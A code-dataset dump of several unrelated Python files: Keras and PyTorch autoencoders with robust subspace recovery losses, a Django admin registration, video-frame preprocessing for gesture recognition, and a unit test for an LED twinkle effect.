c4c6c2d4c3b89d2750e1184059d9cb446cbd03d7
|
[
"MIT"
] | null | null | null |
models/encoders_decoders.py
|
BobakBaghi/McGillPhysHackathon2020
|
c4c6c2d4c3b89d2750e1184059d9cb446cbd03d7
|
[
"MIT"
] | null | null | null |
from keras.models import Model
from keras.layers import Input, Conv2D, Activation, BatchNormalization, Flatten, Dense, Conv2DTranspose, Reshape
from utils import get_channels_axis
import torch
import torch.nn as nn
def conv_encoder(input_side=32, n_channels=3, representation_dim=256, representation_activation='tanh',
intermediate_activation='relu'):
nf = 64
input_shape = (n_channels, input_side, input_side) if get_channels_axis() == 1 else (input_side, input_side,
n_channels)
x_in = Input(shape=input_shape)
enc = x_in
# downsample x0.5
enc = Conv2D(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)
enc = BatchNormalization(axis=get_channels_axis())(enc)
enc = Activation(intermediate_activation)(enc)
# downsample x0.5
enc = Conv2D(nf * 2, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)
enc = BatchNormalization(axis=get_channels_axis())(enc)
enc = Activation(intermediate_activation)(enc)
# downsample x0.5
enc = Conv2D(nf * 4, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)
enc = BatchNormalization(axis=get_channels_axis())(enc)
enc = Activation(intermediate_activation)(enc)
if input_side == 64:
# downsample x0.5
enc = Conv2D(nf * 8, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)
enc = BatchNormalization(axis=get_channels_axis())(enc)
enc = Activation(intermediate_activation)(enc)
enc = Flatten()(enc)
rep = Dense(representation_dim, activation=representation_activation)(enc)
return Model(x_in, rep)
def conv_decoder(output_side=32, n_channels=3, representation_dim=256, activation='relu'):
nf = 64
rep_in = Input(shape=(representation_dim,))
g = Dense(nf * 4 * 4 * 4)(rep_in)
g = BatchNormalization(axis=-1)(g)
g = Activation(activation)(g)
conv_shape = (nf * 4, 4, 4) if get_channels_axis() == 1 else (4, 4, nf * 4)
g = Reshape(conv_shape)(g)
# upsample x2
g = Conv2DTranspose(nf * 2, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)
g = BatchNormalization(axis=get_channels_axis())(g)
g = Activation(activation)(g)
# upsample x2
g = Conv2DTranspose(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)
g = BatchNormalization(axis=get_channels_axis())(g)
g = Activation(activation)(g)
if output_side == 64:
# upsample x2
g = Conv2DTranspose(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)
g = BatchNormalization(axis=get_channels_axis())(g)
g = Activation(activation)(g)
# upsample x2
g = Conv2DTranspose(n_channels, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)
g = Activation('tanh')(g)
return Model(rep_in, g)
class CAE_pytorch(nn.Module):
def __init__(self, in_channels = 3, rep_dim = 256):
super(CAE_pytorch, self).__init__()
nf = 64
self.nf = nf
# Encoder
self.enc_conv1 = nn.Conv2d(in_channels=in_channels, out_channels=nf, kernel_size=3, stride=2, padding=1)
self.enc_bn1 = nn.BatchNorm2d(num_features=nf)
self.enc_act1 = nn.ReLU(inplace=True)
self.enc_conv2 = nn.Conv2d(in_channels=nf, out_channels=nf * 2, kernel_size=3, stride=2, padding=1)
self.enc_bn2 = nn.BatchNorm2d(num_features=nf * 2)
self.enc_act2 = nn.ReLU(inplace=True)
self.enc_conv3 = nn.Conv2d(in_channels=nf * 2, out_channels=nf * 4, kernel_size=3, stride=2, padding=1)
self.enc_bn3 = nn.BatchNorm2d(num_features=nf * 4)
self.enc_act3 = nn.ReLU(inplace=True)
self.enc_fc = nn.Linear(nf * 4 * 4 * 4, rep_dim)
self.rep_act = nn.Tanh()
# Decoder
self.dec_fc = nn.Linear(rep_dim, nf * 4 * 4 * 4)
self.dec_bn0 = nn.BatchNorm1d(num_features=nf * 4 * 4 *4)
self.dec_act0 = nn.ReLU(inplace=True)
self.dec_conv1 = nn.ConvTranspose2d(in_channels=nf * 4, out_channels=nf * 2, kernel_size=3, stride=2, padding=1, output_padding=1)
self.dec_bn1 = nn.BatchNorm2d(num_features=nf * 2)
self.dec_act1 = nn.ReLU(inplace=True)
self.dec_conv2 = nn.ConvTranspose2d(in_channels=nf * 2, out_channels=nf, kernel_size=3, stride=2, padding=1, output_padding=1)
self.dec_bn2 = nn.BatchNorm2d(num_features=nf)
self.dec_act2 = nn.ReLU(inplace=True)
self.dec_conv3 = nn.ConvTranspose2d(in_channels=nf, out_channels=in_channels, kernel_size=3, stride=2, padding=1, output_padding=1)
self.output_act = nn.Tanh()
def encode(self, x):
x = self.enc_act1(self.enc_bn1(self.enc_conv1(x)))
x = self.enc_act2(self.enc_bn2(self.enc_conv2(x)))
x = self.enc_act3(self.enc_bn3(self.enc_conv3(x)))
rep = self.rep_act(self.enc_fc(x.view(x.size(0), -1)))
return rep
def decode(self, rep):
x = self.dec_act0(self.dec_bn0(self.dec_fc(rep)))
x = x.view(-1, self.nf * 4, 4, 4)
x = self.dec_act1(self.dec_bn1(self.dec_conv1(x)))
x = self.dec_act2(self.dec_bn2(self.dec_conv2(x)))
x = self.output_act(self.dec_conv3(x))
return x
def forward(self, x):
return self.decode(self.encode(x))
class RSRAE(nn.Module):
def __init__(self, in_channels = 3, rep_dim = 256):
super(RSRAE, self).__init__()
nf = 64
self.nf = nf
# Encoder
self.enc_conv1 = nn.Conv2d(in_channels=in_channels, out_channels=nf, kernel_size=3, stride=2, padding=1)
self.enc_bn1 = nn.BatchNorm2d(num_features=nf)
self.enc_act1 = nn.ReLU(inplace=True)
self.enc_conv2 = nn.Conv2d(in_channels=nf, out_channels=nf * 2, kernel_size=3, stride=2, padding=1)
self.enc_bn2 = nn.BatchNorm2d(num_features=nf * 2)
self.enc_act2 = nn.ReLU(inplace=True)
self.enc_conv3 = nn.Conv2d(in_channels=nf * 2, out_channels=nf * 4, kernel_size=3, stride=2, padding=1)
self.enc_bn3 = nn.BatchNorm2d(num_features=nf * 4)
self.enc_act3 = nn.ReLU(inplace=True)
self.enc_fc = nn.Linear(nf * 4 * 4 * 4, rep_dim)
self.rep_act = nn.Tanh()
# Robust Subspace Recovery
d = 10
self.A = nn.Parameter(torch.randn(rep_dim, d))
# Decoder
self.dec_fc = nn.Linear(rep_dim, nf * 4 * 4 * 4)
self.dec_bn0 = nn.BatchNorm1d(num_features=nf * 4 * 4 *4)
self.dec_act0 = nn.ReLU(inplace=True)
self.dec_conv1 = nn.ConvTranspose2d(in_channels=nf * 4, out_channels=nf * 2, kernel_size=3, stride=2, padding=1, output_padding=1)
self.dec_bn1 = nn.BatchNorm2d(num_features=nf * 2)
self.dec_act1 = nn.ReLU(inplace=True)
self.dec_conv2 = nn.ConvTranspose2d(in_channels=nf * 2, out_channels=nf, kernel_size=3, stride=2, padding=1, output_padding=1)
self.dec_bn2 = nn.BatchNorm2d(num_features=nf)
self.dec_act2 = nn.ReLU(inplace=True)
self.dec_conv3 = nn.ConvTranspose2d(in_channels=nf, out_channels=in_channels, kernel_size=3, stride=2, padding=1, output_padding=1)
self.output_act = nn.Tanh()
def encode(self, x):
x = self.enc_act1(self.enc_bn1(self.enc_conv1(x)))
x = self.enc_act2(self.enc_bn2(self.enc_conv2(x)))
x = self.enc_act3(self.enc_bn3(self.enc_conv3(x)))
rep = self.rep_act(self.enc_fc(x.view(x.size(0), -1)))
return rep
def decode(self, rep):
x = self.dec_act0(self.dec_bn0(self.dec_fc(rep)))
x = x.view(-1, self.nf * 4, 4, 4)
x = self.dec_act1(self.dec_bn1(self.dec_conv1(x)))
x = self.dec_act2(self.dec_bn2(self.dec_conv2(x)))
x = self.output_act(self.dec_conv3(x))
return x
def forward(self, x):
h = self.encode(x)
hs = h @ self.A
hr = self.A @ hs.t()
hr = hr.t()
rec = self.decode(hr / (torch.norm(hr, dim=1).unsqueeze(-1).repeat(1, hr.size(1)) + 1e-10))
hh = h.detach()
hs2 = hh @ self.A
hr2 = self.A @ hs2.t()
hr2 = hr2.t()
AA = self.A.t() @ self.A
return rec, hh, hr2, AA
class RSRAE_plus(nn.Module):
def __init__(self, in_channels = 3, rep_dim = 256):
super(RSRAE_plus, self).__init__()
nf = 64
self.nf = nf
# Encoder
self.enc_conv1 = nn.Conv2d(in_channels=in_channels, out_channels=nf, kernel_size=3, stride=2, padding=1)
self.enc_bn1 = nn.BatchNorm2d(num_features=nf)
self.enc_act1 = nn.ReLU(inplace=True)
self.enc_conv2 = nn.Conv2d(in_channels=nf, out_channels=nf * 2, kernel_size=3, stride=2, padding=1)
self.enc_bn2 = nn.BatchNorm2d(num_features=nf * 2)
self.enc_act2 = nn.ReLU(inplace=True)
self.enc_conv3 = nn.Conv2d(in_channels=nf * 2, out_channels=nf * 4, kernel_size=3, stride=2, padding=1)
self.enc_bn3 = nn.BatchNorm2d(num_features=nf * 4)
self.enc_act3 = nn.ReLU(inplace=True)
self.enc_fc = nn.Linear(nf * 4 * 4 * 4, rep_dim)
self.rep_act = nn.Tanh()
# Robust Subspace Recovery
d = 10
self.A = nn.Parameter(torch.randn(rep_dim, d))
# Decoder
self.dec_fc = nn.Linear(rep_dim, nf * 4 * 4 * 4)
self.dec_bn0 = nn.BatchNorm1d(num_features=nf * 4 * 4 *4)
self.dec_act0 = nn.ReLU(inplace=True)
self.dec_conv1 = nn.ConvTranspose2d(in_channels=nf * 4, out_channels=nf * 2, kernel_size=3, stride=2, padding=1, output_padding=1)
self.dec_bn1 = nn.BatchNorm2d(num_features=nf * 2)
self.dec_act1 = nn.ReLU(inplace=True)
self.dec_conv2 = nn.ConvTranspose2d(in_channels=nf * 2, out_channels=nf, kernel_size=3, stride=2, padding=1, output_padding=1)
self.dec_bn2 = nn.BatchNorm2d(num_features=nf)
self.dec_act2 = nn.ReLU(inplace=True)
self.dec_conv3 = nn.ConvTranspose2d(in_channels=nf, out_channels=in_channels, kernel_size=3, stride=2, padding=1, output_padding=1)
self.output_act = nn.Tanh()
def encode(self, x):
x = self.enc_act1(self.enc_bn1(self.enc_conv1(x)))
x = self.enc_act2(self.enc_bn2(self.enc_conv2(x)))
x = self.enc_act3(self.enc_bn3(self.enc_conv3(x)))
rep = self.rep_act(self.enc_fc(x.view(x.size(0), -1)))
return rep
def decode(self, rep):
x = self.dec_act0(self.dec_bn0(self.dec_fc(rep)))
x = x.view(-1, self.nf * 4, 4, 4)
x = self.dec_act1(self.dec_bn1(self.dec_conv1(x)))
x = self.dec_act2(self.dec_bn2(self.dec_conv2(x)))
x = self.output_act(self.dec_conv3(x))
return x
def forward(self, x):
h = self.encode(x)
hs = h @ self.A
hr = self.A @ hs.t()
hr = hr.t()
AA = self.A.t() @ self.A
rec = self.decode(hr / (torch.norm(hr, dim=1).unsqueeze(-1).repeat(1, hr.size(1)) + 1e-10))
return rec, h, hr, AA
class L21Loss(nn.Module):
def __init__(self):
super(L21Loss, self).__init__()
def forward(self, x, y):
res = x - y
res = torch.norm(res, dim=1, p=2)
return res.sum()
class RSR1Loss(nn.Module):
def __init__(self):
super(RSR1Loss, self).__init__()
def forward(self, hr, h):
c = L21Loss()
return c(hr, h)
class RSR2Loss(nn.Module):
def __init__(self):
super(RSR2Loss, self).__init__()
def forward(self, AA):
I = torch.ones_like(AA)
res = AA - I
return torch.norm(res)
| 37.695082
| 139
| 0.625468
| 1,771
| 11,497
| 3.862789
| 0.074534
| 0.061395
| 0.041807
| 0.04473
| 0.859962
| 0.845637
| 0.818009
| 0.814062
| 0.803537
| 0.803537
| 0
| 0.048068
| 0.234583
| 11,497
| 304
| 140
| 37.819079
| 0.729318
| 0.018179
| 0
| 0.72093
| 0
| 0
| 0.004261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.023256
| 0.004651
| 0.209302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
773f939d45b43e6c4553b4236ae85768b5b394ac
| 142
|
py
|
Python
|
app/expenses/admin.py
|
esdevop/mymodb
|
392f1024d32cb1e19f39841a7811a4b990813909
|
[
"MIT"
] | null | null | null |
app/expenses/admin.py
|
esdevop/mymodb
|
392f1024d32cb1e19f39841a7811a4b990813909
|
[
"MIT"
] | 3
|
2021-08-13T10:10:21.000Z
|
2021-08-16T10:10:04.000Z
|
app/expenses/admin.py
|
esdevop/mymodb
|
392f1024d32cb1e19f39841a7811a4b990813909
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Expense, ExpensesGroup
admin.site.register(ExpensesGroup)
admin.site.register(Expense)
| 20.285714
| 42
| 0.830986
| 18
| 142
| 6.555556
| 0.555556
| 0.305085
| 0.372881
| 0.508475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091549
| 142
| 6
| 43
| 23.666667
| 0.914729
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
774ad1b82e6bebbc0bccc4a1752ae888b70f8d93
| 86
|
py
|
Python
|
fitapp/tests/__init__.py
|
brad/django-fitbit
|
39278068980a81bb67868b024b09683810cbc9f7
|
[
"Apache-2.0"
] | null | null | null |
fitapp/tests/__init__.py
|
brad/django-fitbit
|
39278068980a81bb67868b024b09683810cbc9f7
|
[
"Apache-2.0"
] | null | null | null |
fitapp/tests/__init__.py
|
brad/django-fitbit
|
39278068980a81bb67868b024b09683810cbc9f7
|
[
"Apache-2.0"
] | null | null | null |
from fitapp.tests.test_retrieval import *
from fitapp.tests.test_integration import *
| 28.666667
| 43
| 0.837209
| 12
| 86
| 5.833333
| 0.583333
| 0.285714
| 0.428571
| 0.542857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 86
| 2
| 44
| 43
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
658515ff98bd28aa97fc595a836575f1b3a85604
| 38
|
py
|
Python
|
psat_server_web/__init__.py
|
genghisken/psat-server-web
|
63c697f1d08dc2173328d3018aadf8efc1e8e14f
|
[
"MIT"
] | null | null | null |
psat_server_web/__init__.py
|
genghisken/psat-server-web
|
63c697f1d08dc2173328d3018aadf8efc1e8e14f
|
[
"MIT"
] | 11
|
2021-03-11T17:28:29.000Z
|
2022-01-05T11:35:14.000Z
|
psat_server_web/__init__.py
|
genghisken/psat-server-web
|
63c697f1d08dc2173328d3018aadf8efc1e8e14f
|
[
"MIT"
] | null | null | null |
from . import atlas
from . import ps1
| 12.666667
| 19
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.210526
| 38
| 2
| 20
| 19
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
65af30bd42e97ec87cc5a026bc2b472ffe6d9f4b
| 10,593
|
py
|
Python
|
networks/inputs.py
|
GuangmingZhu/ConvLSTMForGR
|
14d68f599214f3474819f73512c6faec42df61a2
|
[
"MIT"
] | 10
|
2019-05-30T01:20:10.000Z
|
2022-03-24T07:43:15.000Z
|
networks/inputs.py
|
GuangmingZhu/ConvLSTMForGR
|
14d68f599214f3474819f73512c6faec42df61a2
|
[
"MIT"
] | 1
|
2021-01-09T01:32:58.000Z
|
2021-01-09T01:49:41.000Z
|
networks/inputs.py
|
GuangmingZhu/ConvLSTMForGR
|
14d68f599214f3474819f73512c6faec42df61a2
|
[
"MIT"
] | 3
|
2019-11-28T06:09:44.000Z
|
2020-12-01T08:48:09.000Z
|
import io
import os
import sys
import math
import random
import numpy as np
from scipy.misc import imread, imresize
def load_iso_video_list(path):
assert os.path.exists(path)
f = open(path, 'r')
f_lines = f.readlines()
f.close()
video_data = {}
video_label = []
for idx, line in enumerate(f_lines):
video_key = '%06d' % idx
video_data[video_key] = {}
videopath = line.split(' ')[0]
framecnt = int(line.split(' ')[1])
videolabel = int(line.split(' ')[2])
video_data[video_key]['videopath'] = videopath
video_data[video_key]['framecnt'] = framecnt
video_label.append(videolabel)
return video_data,video_label
def prepare_iso_rgb_data(image_info):
video_path = image_info[0]
video_frame_cnt = image_info[1]
output_frame_cnt = image_info[2]
start_frame_idx = image_info[3]
is_training = image_info[4]
assert os.path.exists(video_path)
rand_frames = np.zeros(output_frame_cnt)
div = float(video_frame_cnt)/float(output_frame_cnt)
scale = math.floor(div)
if is_training:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
elif scale == 1:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt) + \
float(scale)/2*(np.random.random(size=output_frame_cnt)-0.5)
else:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
rand_frames[0] = max(rand_frames[0], 0)
rand_frames[output_frame_cnt-1] = min(rand_frames[output_frame_cnt-1], video_frame_cnt-1)
rand_frames = np.floor(rand_frames)+start_frame_idx
average_values = [112,112,112]
processed_images = np.empty((output_frame_cnt, 112, 112, 3), dtype=np.float32)
crop_random = random.random()
for idx in xrange(0, output_frame_cnt):
image_file = '%s/%06d.jpg' %(video_path, rand_frames[idx])
assert os.path.exists(image_file)
image = imread(image_file)
image_h, image_w, image_c = np.shape(image)
square_sz = min(image_h, image_w)
if is_training:
crop_h = int((image_h - square_sz)*crop_random)
crop_w = int((image_w - square_sz)*crop_random)
else:
crop_h = int((image_h - square_sz)/2)
crop_w = int((image_w - square_sz)/2)
image_crop = image[crop_h:crop_h+square_sz,crop_w:crop_w+square_sz,::]
processed_images[idx] = imresize(image_crop, (112,112)) - average_values
return processed_images
def prepare_iso_depth_data(image_info):
video_path = image_info[0]
video_frame_cnt = image_info[1]
output_frame_cnt = image_info[2]
start_frame_idx = image_info[3]
is_training = image_info[4]
assert os.path.exists(video_path)
rand_frames = np.zeros(output_frame_cnt)
div = float(video_frame_cnt)/float(output_frame_cnt)
scale = math.floor(div)
if is_training:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
elif scale == 1:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt) + \
float(scale)/2*(np.random.random(size=output_frame_cnt)-0.5)
else:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
rand_frames[0] = max(rand_frames[0], 0)
rand_frames[output_frame_cnt-1] = min(rand_frames[output_frame_cnt-1], video_frame_cnt-1)
rand_frames = np.floor(rand_frames)+start_frame_idx
average_values = [127,127,127]
processed_images = np.empty((output_frame_cnt, 112, 112, 3), dtype=np.float32)
crop_random = random.random()
for idx in xrange(0, output_frame_cnt):
image_file = '%s/%06d.jpg' %(video_path, rand_frames[idx])
assert os.path.exists(image_file)
image = imread(image_file)
image_h, image_w, image_c = np.shape(image)
square_sz = min(image_h, image_w)
if is_training:
crop_h = int((image_h - square_sz)*crop_random)
crop_w = int((image_w - square_sz)*crop_random)
else:
crop_h = int((image_h - square_sz)/2)
crop_w = int((image_w - square_sz)/2)
image_crop = image[crop_h:crop_h+square_sz,crop_w:crop_w+square_sz,::]
processed_images[idx] = imresize(image_crop, (112,112)) - average_values
return processed_images
def prepare_iso_flow_data(image_info):
video_path = image_info[0]
video_frame_cnt = image_info[1]
output_frame_cnt = image_info[2]
start_frame_idx = image_info[3]
is_training = image_info[4]
assert os.path.exists(video_path)
rand_frames = np.zeros(output_frame_cnt)
div = float(video_frame_cnt)/float(output_frame_cnt)
scale = math.floor(div)
if is_training:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
elif scale == 1:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt) + \
float(scale)/2*(np.random.random(size=output_frame_cnt)-0.5)
else:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
rand_frames[0] = max(rand_frames[0], 0)
rand_frames[output_frame_cnt-1] = min(rand_frames[output_frame_cnt-1], video_frame_cnt-1)
rand_frames = np.floor(rand_frames)+start_frame_idx
average_values = [128,128,128]
processed_images = np.empty((output_frame_cnt, 112, 112, 3), dtype=np.float32)
crop_random = random.random()
for idx in xrange(0, output_frame_cnt):
image_file = '%s/%06d.jpg' %(video_path, rand_frames[idx])
assert os.path.exists(image_file)
image = imread(image_file)
image_h, image_w, image_c = np.shape(image)
square_sz = min(image_h, image_w)
if is_training:
crop_h = int((image_h - square_sz)*crop_random)
crop_w = int((image_w - square_sz)*crop_random)
else:
crop_h = int((image_h - square_sz)/2)
crop_w = int((image_w - square_sz)/2)
image_crop = image[crop_h:crop_h+square_sz,crop_w:crop_w+square_sz,::]
processed_images[idx] = imresize(image_crop, (112,112)) - average_values
return processed_images
def prepare_jester_rgb_data(image_info):
video_path = image_info[0]
video_frame_cnt = image_info[1]
output_frame_cnt = image_info[2]
start_frame_idx = image_info[3]
is_training = image_info[4]
assert os.path.exists(video_path)
rand_frames = np.zeros(output_frame_cnt)
div = float(video_frame_cnt)/float(output_frame_cnt)
scale = math.floor(div)
if is_training:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
elif scale == 1:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt) + \
float(scale)/2*(np.random.random(size=output_frame_cnt)-0.5)
else:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
rand_frames[0] = max(rand_frames[0], 0)
rand_frames[output_frame_cnt-1] = min(rand_frames[output_frame_cnt-1], video_frame_cnt-1)
rand_frames = np.floor(rand_frames)+start_frame_idx
average_values = [114,109,104]
processed_images = np.empty((output_frame_cnt, 112, 112, 3), dtype=np.float32)
crop_random = random.random()
for idx in xrange(0, output_frame_cnt):
image_file = '%s/%05d.jpg' %(video_path, rand_frames[idx])
assert os.path.exists(image_file)
image = imread(image_file)
image_h, image_w, image_c = np.shape(image)
square_sz = min(image_h, image_w)
if is_training:
crop_h = int((image_h - square_sz)*crop_random)
crop_w = int((image_w - square_sz)*crop_random)
else:
crop_h = int((image_h - square_sz)/2)
crop_w = int((image_w - square_sz)/2)
image_crop = image[crop_h:crop_h+square_sz,crop_w:crop_w+square_sz,::]
processed_images[idx] = imresize(image_crop, (112,112)) - average_values
return processed_images
def prepare_jester_flow_data(image_info):
video_path = image_info[0]
video_frame_cnt = image_info[1]-1
output_frame_cnt = image_info[2]
start_frame_idx = image_info[3]
is_training = image_info[4]
assert os.path.exists(video_path)
rand_frames = np.zeros(output_frame_cnt)
div = float(video_frame_cnt)/float(output_frame_cnt)
scale = math.floor(div)
if is_training:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
elif scale == 1:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt) + \
float(scale)/2*(np.random.random(size=output_frame_cnt)-0.5)
else:
if scale == 0:
rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
rand_frames[video_frame_cnt::] = video_frame_cnt-1
else:
rand_frames[::] = div*np.arange(0, output_frame_cnt)
rand_frames[0] = max(rand_frames[0], 0)
rand_frames[output_frame_cnt-1] = min(rand_frames[output_frame_cnt-1], video_frame_cnt-1)
rand_frames = np.floor(rand_frames)+start_frame_idx
average_values = [128,128,128]
processed_images = np.empty((output_frame_cnt, 112, 112, 3), dtype=np.float32)
crop_random = random.random()
for idx in xrange(0, output_frame_cnt):
image_file = '%s/%06d.jpg' %(video_path, rand_frames[idx])
assert os.path.exists(image_file)
image = imread(image_file)
image_h, image_w, image_c = np.shape(image)
square_sz = min(image_h, image_w)
if is_training:
crop_h = int((image_h - square_sz)*crop_random)
crop_w = int((image_w - square_sz)*crop_random)
else:
crop_h = int((image_h - square_sz)/2)
crop_w = int((image_w - square_sz)/2)
image_crop = image[crop_h:crop_h+square_sz,crop_w:crop_w+square_sz,::]
processed_images[idx] = imresize(image_crop, (112,112)) - average_values
return processed_images
| 39.526119
| 91
| 0.698952
| 1,711
| 10,593
| 3.981297
| 0.059614
| 0.129184
| 0.104962
| 0.05138
| 0.937317
| 0.929683
| 0.929683
| 0.929683
| 0.929683
| 0.929683
| 0
| 0.032103
| 0.1737
| 10,593
| 267
| 92
| 39.674157
| 0.746144
| 0
| 0
| 0.866142
| 0
| 0
| 0.007553
| 0
| 0
| 0
| 0
| 0
| 0.043307
| 1
| 0.023622
| false
| 0
| 0.027559
| 0
| 0.074803
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65b177df48fa1120e83e66d748733bc09cee1b64
| 3,087
|
py
|
Python
|
Sequences/twinkle_test.py
|
weidnerm/pi-ws2812
|
87840f43adca9d76d3cb565893de91329b8e99b2
|
[
"BSD-2-Clause"
] | null | null | null |
Sequences/twinkle_test.py
|
weidnerm/pi-ws2812
|
87840f43adca9d76d3cb565893de91329b8e99b2
|
[
"BSD-2-Clause"
] | null | null | null |
Sequences/twinkle_test.py
|
weidnerm/pi-ws2812
|
87840f43adca9d76d3cb565893de91329b8e99b2
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from twinkle import StarObject;
class TestStringMethods(unittest.TestCase):
m_Star = None;
def setUp(self):
self.m_Star = StarObject(4,6,8,10,int("ff7f3f",16),2,20, 0);
def tearDown(self):
self.m_Star = None
def test_split(self):
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,3f1f0f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,7f3f1f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,bf5f2f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,ff7f3f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,df6f37,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,bf5f2f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,9f4f27,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,7f3f1f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,5f2f17,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,3f1f0f,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,1f0f07,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
